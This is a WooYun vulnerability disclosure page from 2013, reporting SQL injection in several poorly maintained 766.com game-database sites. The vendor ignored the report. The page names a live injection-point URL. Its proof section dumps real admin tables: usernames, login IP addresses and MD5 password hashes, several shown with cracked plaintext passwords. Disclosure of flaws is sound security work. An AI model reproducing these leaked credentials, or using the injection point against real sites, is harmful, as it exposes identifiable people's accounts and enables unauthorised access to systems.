当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035621

漏洞标题:766一堆年久失修的网站存在SQL注入

相关厂商:766.com

漏洞作者: Ovear

提交时间:2013-08-29 18:54

修复时间:2013-09-03 18:55

公开时间:2013-09-03 18:55

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:2

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-29: 细节已通知厂商并且等待厂商处理中
2013-09-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

你懂得最基本的sql注入

详细说明:

大部分db查询都使用的一套系统
注入点就是
http://at.db.766.com/search.php?search.php?action=8&start=16&end=30&gwpage=3#gw
还有其他使用同样系统的,梦幻西游啊,什么什么什么的,基本上就是年久失修的网站

漏洞证明:

+-----+---------+---------------+----------+-------------------------------------------+------------+--------------+
| uid | adminid | lastip        | username | password                                  | updateuser | lastactivity |
+-----+---------+---------------+----------+-------------------------------------------+------------+--------------+
| 1   | 1       | 117.84.151.95 | dragon   | 8621ffdbc5698829397d97767ac13db3 (dragon) | <blank>    | 1319755592   |
| 2   | 1       | 218.66.36.119 | 上天入地     | e10adc3949ba59abbe56e057f20f883e (123456) | <blank>    | 1245824876   |
| 3   | 1       | 117.84.151.95 | bayon3t  | 326cbac35cb3b880ecd5ff67dcd276aa (banker) | <blank>    | 1319755703   |
| 4   | 1       | 218.66.36.119 | keepnet  | 6cc1c40f6caa5f92897e4241a31b8991          | <blank>    | 1307431737   |
| 5   | 3       | 218.66.57.81  | 766com   | 5b711ebff2c42e3cfac6e3ec63781d3e          | <blank>    | 1361329083   |
+-----+---------+---------------+----------+-------------------------------------------+------------+--------------+


[22 tables]
+-----------------+
| x_admins        |
| x_adminsessions |
| x_at_charaters  |
| x_at_datas      |
| x_at_types      |
| x_attachtypes   |
| x_codes         |
| x_failedlogins  |
| x_gws           |
| x_keywords      |
| x_maps          |
| x_npcs          |
| x_occs          |
| x_rws           |
| x_settings      |
| x_skills        |
| x_styles        |
| x_stylevars     |
| x_templates     |
| x_wps           |
| x_yblevs        |
| x_ybs           |
+-----------------+


Database: db_mhxy
Table: m_admins
[13 entries]
+---------+--------------+---------------+----------------------------------+-----+------------+
| adminid | lastactivity | lastip        | password                         | uid | username   |
+---------+--------------+---------------+----------------------------------+-----+------------+
| 1       | 1310372668   | 120.35.10.225 | 3694e44a7669c4986424bfbb8897cfdf | 13  | xiaomo     |
| 1       | 1310375919   | 120.35.10.225 | 348f10f863b27ec106195c96e23dcd91 | 12  | xiaoyu     |
| 1       | 1301646109   | 218.66.36.119 | 1bed827ff753e81958090540dced95af | 11  | xiu        |
| 1       | 1301475208   | 120.35.10.225 | 3dc5f2a5448ea681ad7ec5a59ca11f2e | 10  | xiangxiang |
| 1       | 1301476079   | 120.35.10.225 | 242bfc1fb44b238986ab168d3610b771 | 9   | yingzi     |
| 1       | 1310630815   | 218.66.36.119 | df1bfa7d7bd66664564262fe4dbc8bcc | 8   | daodao     |
| 1       | 1301449543   | 120.35.10.225 | afe1b6a9a0055f31096ffd2c8b8066e1 | 7   | dilei      |
| 1       | 1301364743   | 120.35.10.225 | a3fbf203ed16a936a471b674f09846da | 6   | junfeng    |
| 1       | 1301645302   | 120.35.10.225 | 688f227b9cad4edeed15f067e04d3764 | 5   | lei        |
| 1       | 1300675347   | 120.35.10.225 | f4fe292eb01627a0219872d44a305ec5 | 4   | x5         |
| 1       | 1305005162   | 218.66.36.119 | ff89cc66529a8e4aa81bac2a86fa51be | 3   | vincentkid |
| 1       | 1302689813   | 218.66.36.119 | 73f50c9f17291ce93ee52e50b73f6f63 | 2   | lan        |
| 1       | 1317088177   | 218.66.36.119 | e10adc3949ba59abbe56e057f20f883e | 1   | admin      |
+---------+--------------+---------------+----------------------------------+-----+------------+


修复方案:

该删的删,该补的补

版权声明:转载请注明来源 Ovear@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-09-03 18:55

厂商回复:

最新状态:

暂无